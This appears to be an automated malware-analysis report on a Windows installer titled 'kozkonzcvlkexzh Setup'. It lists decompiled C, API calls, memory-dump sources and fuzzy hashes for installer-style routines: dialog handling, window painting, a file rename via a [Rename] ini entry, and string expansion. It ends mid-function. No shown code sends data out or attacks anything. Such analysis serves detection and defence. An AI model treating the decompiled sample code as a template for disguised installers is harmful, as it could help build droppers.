                                                0x00403c0f
                                                0x00403c15
                                                0x00403c1b
                                                0x00403c1f
                                                0x00403c26
                                                0x00403c26
                                                0x00403c26
                                                0x00403c30
                                                0x00403c42
                                                0x00403c4e
                                                0x00403c53
                                                0x00403c5d
                                                0x00403c63
                                                0x00403c65
                                                0x00403c6a
                                                0x00403c67
                                                0x00403c67
                                                0x00403c67
                                                0x00403c7a
                                                0x00403c92
                                                0x00403c94
                                                0x00403c9a
                                                0x00403caf
                                                0x00403c9c
                                                0x00403ca5
                                                0x00403ca7
                                                0x00403ca7
                                                0x00403cb5
                                                0x00403cc5
                                                0x00403cd6
                                                0x00403cdd
                                                0x00403ce3
                                                0x00403ce7
                                                0x00403cec
                                                0x00403cee
                                                0x00000000
                                                0x00403cf4
                                                0x00403cf4
                                                0x00403cf6
                                                0x00000000
                                                0x00000000
                                                0x00403cfc
                                                0x00403d00
                                                0x00403d25
                                                0x00403d2b
                                                0x00403d31
                                                0x00403d33
                                                0x00000000
                                                0x00000000
                                                0x00403d59
                                                0x00403d5f
                                                0x00403d61
                                                0x00403d66
                                                0x00000000
                                                0x00000000
                                                0x00403d6c
                                                0x00403d6f
                                                0x00403d72
                                                0x00403d89
                                                0x00403d95
                                                0x00403dae
                                                0x00403db4
                                                0x00403db8
                                                0x00403dbd
                                                0x00403dc3
                                                0x00000000
                                                0x00000000
                                                0x00403dcd
                                                0x00403dd8
                                                0x00000000
                                                0x00403dd8
                                                0x00403d02
                                                0x00403d08
                                                0x00000000
                                                0x00000000
                                                0x00403d0e
                                                0x00403d14
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403d1a
                                                0x00403cee
                                                0x00403de5
                                                0x00403df1
                                                0x00403df8
                                                0x00000000
                                                0x00403b49
                                                0x00403b49
                                                0x00403b4c
                                                0x00403b7f
                                                0x00403b7f
                                                0x00403b81
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403b81
                                                0x00403b4e
                                                0x00403b52
                                                0x00403b57
                                                0x00403b59
                                                0x00000000
                                                0x00000000
                                                0x00403b69
                                                0x00403b71
                                                0x00000000
                                                0x00403b77
                                                0x004039a5
                                                0x004039a5
                                                0x004039a9
                                                0x004039ae
                                                0x004039bd
                                                0x004039bd
                                                0x004039c6
                                                0x004039cf
                                                0x004039da
                                                0x004039da
                                                0x004039e6
                                                0x00403a02
                                                0x00403a05
                                                0x00403a18
                                                0x00403a1e
                                                0x00403ac1
                                                0x00000000
                                                0x00403aca
                                                0x00403a24
                                                0x00403a31
                                                0x00403a33
                                                0x00403a35
                                                0x00403a54
                                                0x00403a54
                                                0x00403a57
                                                0x00403a5c
                                                0x00403a5f
                                                0x00403a6f
                                                0x00403a70
                                                0x00403a72
                                                0x00403aa8
                                                0x00403abb
                                                0x00000000
                                                0x00403abb
                                                0x00403a74
                                                0x00403a7a
                                                0x00403a93
                                                0x00403a98
                                                0x00403a9a
                                                0x00000000
                                                0x00000000
                                                0x00403a9c
                                                0x00403a88
                                                0x00403a88
                                                0x00403a8a
                                                0x00403a8a
                                                0x00000000
                                                0x00403a8a
                                                0x00403a7d
                                                0x00403a82
                                                0x00000000
                                                0x00403a82
                                                0x00403a61
                                                0x00403a67
                                                0x00000000
                                                0x00000000
                                                0x00403a69
                                                0x00000000
                                                0x00403a69
                                                0x00403a59
                                                0x00000000
                                                0x00403a59
                                                0x00403a3f
                                                0x00403a46
                                                0x00403a4c
                                                0x00403a4e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403a4e
                                                0x00403a0a
                                                0x00000000
                                                0x004039e8
                                                0x004039ee
                                                0x004039f8
                                                0x00403dfe
                                                0x00403e04
                                                0x00403e06
                                                0x00403e0c
                                                0x00403e11
                                                0x00403e17
                                                0x00403e17
                                                0x00403e0c
                                                0x00403e21
                                                0x00000000
                                                0x00403e21
                                                0x004039e6

                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                                                • ShowWindow.USER32(?), ref: 004039DA
                                                • DestroyWindow.USER32 ref: 004039EE
                                                • SetWindowLongA.USER32 ref: 00403A0A
                                                • GetDlgItem.USER32(?,?), ref: 00403A2B
                                                • SendMessageA.USER32 ref: 00403A3F
                                                • IsWindowEnabled.USER32(00000000), ref: 00403A46
                                                • GetDlgItem.USER32(?,00000001), ref: 00403AF4
                                                • GetDlgItem.USER32(?,00000002), ref: 00403AFE
                                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403B18
                                                • SendMessageA.USER32 ref: 00403B69
                                                • GetDlgItem.USER32(?,00000003), ref: 00403C0F
                                                • ShowWindow.USER32(00000000,?), ref: 00403C30
                                                • EnableWindow.USER32(?,?), ref: 00403C42
                                                • EnableWindow.USER32(?,?), ref: 00403C5D
                                                • GetSystemMenu.USER32 ref: 00403C73
                                                • EnableMenuItem.USER32 ref: 00403C7A
                                                • SendMessageA.USER32 ref: 00403C92
                                                • SendMessageA.USER32 ref: 00403CA5
                                                • lstrlenA.KERNEL32(00420538,?,00420538,kozkonzcvlkexzh Setup), ref: 00403CCE
                                                • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                                                • ShowWindow.USER32(?,0000000A), ref: 00403E11
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                • String ID: kozkonzcvlkexzh Setup
                                                • API String ID: 184305955-2504297560
                                                • Opcode ID: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                                • Instruction ID: 5fd13e9e65c650ae90d185cc2d11acb2e8fe01e0af56b63b73109b0399f4b85d
                                                • Opcode Fuzzy Hash: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                                • Instruction Fuzzy Hash: EFC1CF71A04201BBDB20AF61ED85D2B7EBCEB4470AB40453EF541B51E1C73DAA429F5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403F9C, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 93%
                                                			E00403F9C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420518 =  *0x420518 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EBB(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422ee0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422ee0
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f48, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f48, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420518 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd08 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E76(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404227();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42371c; // 0x608bff
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423f78; // 0x607158
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F68;
				E00403E54(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E54(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E76( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E89(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423f50; // 0x601fd8
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f4fc =  *0x41f4fc & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420518 =  *0x420518 & 0x00000000;
				return 0;
			}




















                                                0x00403fac
                                                0x004040d2
                                                0x0040412e
                                                0x00404132
                                                0x00404209
                                                0x0040420b
                                                0x0040420b
                                                0x00404211
                                                0x00404211
                                                0x00404214
                                                0x00000000
                                                0x0040421b
                                                0x00404140
                                                0x00404142
                                                0x0040414c
                                                0x00404157
                                                0x0040415a
                                                0x0040415d
                                                0x00404168
                                                0x0040416b
                                                0x00404172
                                                0x00404180
                                                0x00404198
                                                0x004041a0
                                                0x004041ab
                                                0x004041bb
                                                0x004041bd
                                                0x004041bd
                                                0x00404172
                                                0x004041c7
                                                0x00000000
                                                0x004041d2
                                                0x004041d6
                                                0x004041e7
                                                0x004041e7
                                                0x004041ed
                                                0x004041fb
                                                0x004041fb
                                                0x00000000
                                                0x004041ff
                                                0x004041c7
                                                0x004040dd
                                                0x00000000
                                                0x004040f1
                                                0x004040f7
                                                0x004040fd
                                                0x00000000
                                                0x00000000
                                                0x00404122
                                                0x00404124
                                                0x00404129
                                                0x00000000
                                                0x00404129
                                                0x004040dd
                                                0x00403fb2
                                                0x00403fb5
                                                0x00403fba
                                                0x00403fbc
                                                0x00403fcb
                                                0x00403fcb
                                                0x00403fcd
                                                0x00403fd2
                                                0x00403fd5
                                                0x00403fd7
                                                0x00403fdc
                                                0x00403fe5
                                                0x00403feb
                                                0x00403ff7
                                                0x00403ffa
                                                0x00404003
                                                0x00404008
                                                0x0040400b
                                                0x00404010
                                                0x00404027
                                                0x0040402e
                                                0x00404041
                                                0x00404044
                                                0x00404059
                                                0x0040405b
                                                0x00404060
                                                0x00404065
                                                0x0040406a
                                                0x0040406a
                                                0x00404079
                                                0x00404088
                                                0x0040408a
                                                0x004040a0
                                                0x004040af
                                                0x004040b1
                                                0x00000000

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                • String ID: N$open$.B
                                                • API String ID: 3615053054-720656042
                                                • Opcode ID: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                • Instruction ID: d52f05746bbb3f3b1d606d9c91532631e65720296560e4ea5c31ec00add49965
                                                • Opcode Fuzzy Hash: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                                • Instruction Fuzzy Hash: 0161D571A40309BBEB109F60DD45F6A7B69FB54715F108036FB04BA2D1C7B8AA51CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 10003510, Relevance: 33.3, APIs: 22, Instructions: 280fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: File$ErrorLast$View$CloseCreateHandleMappingSize$PointerUnmap
                                                • String ID:
                                                • API String ID: 2750380209-0
                                                • Opcode ID: 938e871ca43ba9d6f85a09dcb3d126173da7e9b71146e472b66c4393e983a2c6
                                                • Instruction ID: 246f83eb046c6acef81ee336314e226087782afd8f3c94662116537e38e35e4e
                                                • Opcode Fuzzy Hash: 938e871ca43ba9d6f85a09dcb3d126173da7e9b71146e472b66c4393e983a2c6
                                                • Instruction Fuzzy Hash: 8CE17DB49087818FE760DF28C58875BBBE4FB88354F108A2EE89987394D7759548CF93
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f50; // 0x601fd8
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "kozkonzcvlkexzh Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423f48; // 0x50378
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                                0x0040100a
                                                0x00401039
                                                0x00401047
                                                0x0040104d
                                                0x00401051
                                                0x0040105b
                                                0x00401061
                                                0x00401064
                                                0x004010f3
                                                0x00401089
                                                0x0040108c
                                                0x004010a6
                                                0x004010bd
                                                0x004010cc
                                                0x004010cf
                                                0x004010d5
                                                0x004010d9
                                                0x004010e4
                                                0x004010ed
                                                0x004010ef
                                                0x004010ef
                                                0x00401100
                                                0x00401105
                                                0x0040110d
                                                0x00401110
                                                0x00401112
                                                0x00401118
                                                0x0040111f
                                                0x00401126
                                                0x00401130
                                                0x00401142
                                                0x00401156
                                                0x00401160
                                                0x00401165
                                                0x00401165
                                                0x00401110
                                                0x0040116e
                                                0x00000000
                                                0x00401178
                                                0x00401010
                                                0x00401013
                                                0x00401015
                                                0x00401019
                                                0x0040101f
                                                0x0040101f
                                                0x00000000

                                                APIs
                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32 ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextA.USER32(00000000,kozkonzcvlkexzh Setup,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F$kozkonzcvlkexzh Setup
                                                • API String ID: 941294808-2598242078
                                                • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                                • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                                                • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                                • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004058E6, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 93%
                                                			E004058E6(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F28(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423fd0 =  *0x423fd0 + 1;
						return _t20;
					}
				}
				 *0x4226c8 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422140, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d40, "%s=%s\r\n", 0x4226c8, 0x422140);
						_t18 =  *0x423f50; // 0x601fd8
						_t56 = _t55 + 0x10;
						E00405BBA(_t43, 0x400, 0x422140, 0x422140,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040586F(0x422140, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057E4(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057E4(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405830(_t51 + _t29, 0x421d40, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B98(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040586F(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x4226c8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                                                0x004058ec
                                                0x004058f3
                                                0x004058f7
                                                0x00405900
                                                0x00405904
                                                0x00405a43
                                                0x00405a43
                                                0x00000000
                                                0x00405a43
                                                0x00405904
                                                0x00405910
                                                0x00405926
                                                0x0040594e
                                                0x00405959
                                                0x0040595d
                                                0x0040597d
                                                0x0040597f
                                                0x00405984
                                                0x0040598e
                                                0x0040599b
                                                0x004059a0
                                                0x004059a5
                                                0x004059a9
                                                0x00000000
                                                0x00000000
                                                0x004059b8
                                                0x004059ba
                                                0x004059c7
                                                0x004059cb
                                                0x00405a3c
                                                0x00405a3d
                                                0x00000000
                                                0x004059e7
                                                0x004059f4
                                                0x00405a59
                                                0x00405a60
                                                0x00405a07
                                                0x00405a07
                                                0x00405a09
                                                0x00405a12
                                                0x00405a1d
                                                0x00405a2f
                                                0x00405a36
                                                0x00000000
                                                0x00405a36
                                                0x00405a62
                                                0x00405a63
                                                0x00405a68
                                                0x00405a6a
                                                0x00405a77
                                                0x00405a77
                                                0x00405a7b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405a6c
                                                0x00405a6c
                                                0x00405a6f
                                                0x00405a72
                                                0x00405a73
                                                0x00000000
                                                0x00405a6c
                                                0x004059ff
                                                0x00405a04
                                                0x00000000
                                                0x00405a04
                                                0x004059cb
                                                0x00405928
                                                0x00405933
                                                0x0040593c
                                                0x00405940
                                                0x00000000
                                                0x00000000
                                                0x00405940
                                                0x00405a4d

                                                APIs
                                                  • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                  • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                                • CloseHandle.KERNEL32(00000000), ref: 00405933
                                                • GetShortPathNameA.KERNEL32 ref: 0040593C
                                                • GetShortPathNameA.KERNEL32 ref: 00405959
                                                • wsprintfA.USER32 ref: 00405977
                                                • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004059D7
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405A2F
                                                • GlobalFree.KERNEL32(00000000), ref: 00405A36
                                                • CloseHandle.KERNEL32(00000000), ref: 00405A3D
                                                  • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                  • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                • String ID: %s=%s$@!B$[Rename]
                                                • API String ID: 3445103937-2946522640
                                                • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                                                • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405BBA, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 74%
                                                			E00405BBA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42371c; // 0x608bff
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x423f78; // 0x607158
				_t74 = _t73 + _t36;
				_t37 = 0x422ee0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422ee0;
				if(_a4 - 0x422ee0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
